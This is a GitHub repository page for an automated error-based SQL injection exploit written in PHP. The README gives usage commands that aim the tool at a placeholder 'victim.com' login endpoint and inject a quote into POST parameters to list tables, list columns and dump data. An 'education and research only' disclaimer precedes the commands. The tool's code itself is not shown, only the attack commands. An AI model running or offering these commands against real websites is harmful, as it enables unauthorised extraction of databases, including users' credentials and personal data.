Skip to content

exploreourbrain/Error-Based-SQL-Injection-PHP-Exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Error Based SQL Injection PHP Exploit

A PHP Exploit Auto SQL Injection Error Based

Disclaimer :

the use of this open source is YOUR RESPONSIBILITY I take NO responsibility and/or liability for how you choose to use any of this source code. By using of this file, you understand that you are AGREEING TO USE AT YOUR OWN RISK. Once again, Source code available is for EDUCATION and/or RESEARCH purposes ONLY.

USAGE :

1. Retrieve Table

use --params="parameter1=value1' don't forget ' (single quote) or " (double quote) to delimit strings [ for POST METHOD ]

(reference : https://security.stackexchange.com/questions/67972/why-do-testers-often-use-the-single-quote-to-test-for-sql-injection)

ex command : php eb.php -u=http://victim.com/inject/point --params="username=ExploreOurBrain'&password=123" --tables

2. Retrieve Columns of Table

ex command : php eb.php -u=http://victim.com/inject/point --params="username=ExploreOurBrain'&password=123" -T=table_victim --columns

2. Retrieve Data

ex command : php eb.php -u=http://victim.com/inject/point --params="username=ExploreOurBrain'&password=123" -T=table_victim -C=column1,column2,column3 etc --dump

About

A PHP Exploit Auto SQL Injection Error Based

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages